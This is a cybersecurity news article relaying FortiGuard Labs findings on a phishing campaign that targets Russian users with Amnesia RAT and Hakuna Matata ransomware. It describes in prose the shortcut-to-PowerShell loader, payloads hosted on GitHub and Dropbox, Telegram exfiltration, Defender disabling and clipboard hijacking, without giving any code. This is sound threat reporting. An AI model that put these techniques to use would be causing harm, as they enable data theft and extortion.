U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Amnesia RAT deployed in multi-stage phishing attacks against Russian users

A multi-stage phishing campaign targets users in Russia with ransomware and Amnesia RAT using fake business documents as lures. FortiGuard Labs researchers uncovered a multi-stage malware campaign mainly targeting users in Russia. The attack uses fake business documents as social engineering lures to distract victims while malware runs in the background. It escalates to full […]

Amnesia RAT

A multi-stage phishing campaign targets users in Russia with ransomware and Amnesia RAT using fake business documents as lures.

FortiGuard Labs researchers uncovered a multi-stage malware campaign mainly targeting users in Russia. The attack uses fake business documents as social engineering lures to distract victims while malware runs in the background. It escalates to full system compromise, deploying Amnesia RAT and ransomware, disabling Microsoft Defender via the Defendnot tool, and abusing GitHub and Dropbox to host payloads and evade detection.

“The threat actors further increase resilience by separating payload hosting across multiple public cloud services. GitHub is primarily used to distribute scripts, while Dropbox hosts binary payloads.” reads the report published by FortiGuard Labs. “This modular hosting approach allows attackers to update or rotate components independently, complicates takedown efforts, and helps malicious traffic blend into legitimate enterprise network activity.”

The attack chain starts when a victim opens a compressed archive that looks like normal business material. The archive contains fake accounting files with Russian names that match everyday work tasks. Inside, a shortcut file pretends to be a text document for accountants. When the user clicks it, the file launches PowerShell and downloads a script from GitHub. The threat actors do not use exploits; they rely entirely on user interaction, which makes it effective in corporate environments.

The PowerShell script, called kira.ps1, acts as a loader. It hides the PowerShell window to avoid suspicion and creates a fake accounting document on the system. The script opens this document to keep the user busy while malware runs in the background. It also sends a message to the attacker via Telegram to confirm the infection. After a short delay, it downloads and runs an obfuscated VBScript in hidden mode.

“Once written to disk, the decoy document is automatically opened. This reinforces the appearance of a legitimate business task and keeps the user engaged while malicious activity continues in the background.” continues the report. “After establishing this distraction, the script sends an execution confirmation to the attacker using the Telegram Bot API. The message includes user-context information, allowing the attacker to verify that the initial stage has been executed successfully on a live system.”

This second script works as the main controller. It stays encoded on disk and rebuilds the real malicious code only in memory using Base64 and RC4 decoding. This approach limits detection. The final stage initializes system objects, checks for administrator rights, and repeatedly triggers UAC prompts until it gains elevated privileges. Once ready, the malware moves to its final operational phase and continues the attack.

In the final phase, the malware launches its most damaging actions after disabling defenses and blocking recovery. It installs Amnesia RAT to maintain long-term control and steal data. The RAT hides as “svchost.scr”, gains persistence, and steals browser credentials, Telegram sessions, crypto wallets, Discord and Steam data, seed phrases, and detailed system information. It also enables screenshots, audio capture, remote commands, and data exfiltration through Telegram and file-hosting services.

“Amnesia RAT is designed for broad, multi-category data theft combined with real-time surveillance and system control.” continues the report.

Afterward, the attack deploys Hakuna Matata ransomware. This payload encrypts a wide range of files, adds a custom extension, drops ransom notes, changes the wallpaper, kills key processes, and replaces crypto addresses in the clipboard. In parallel, a WinLocker component fully blocks the desktop and shows messages that pressure victims to contact attackers quickly.

“The ransomware maintains a continuous execution loop that actively monitors and hijacks clipboard contents, replacing cryptocurrency wallet addresses with attacker-controlled values.” continues the report. “Combined with encryption, lockout mechanisms, and coercive visual messaging, these behaviors demonstrate an attack model built for maximum leverage, sustained control, and financial extraction.”

Together, these steps ensure maximum disruption, control, and financial leverage.

“This attack chain demonstrates how modern malware campaigns can achieve full system compromise without exploiting software vulnerabilities.” concludes the report. “Instead, the threat actor relies on social engineering, widely trusted platforms such as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and execute payloads while blending into normal enterprise traffic.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Amnesia RAT)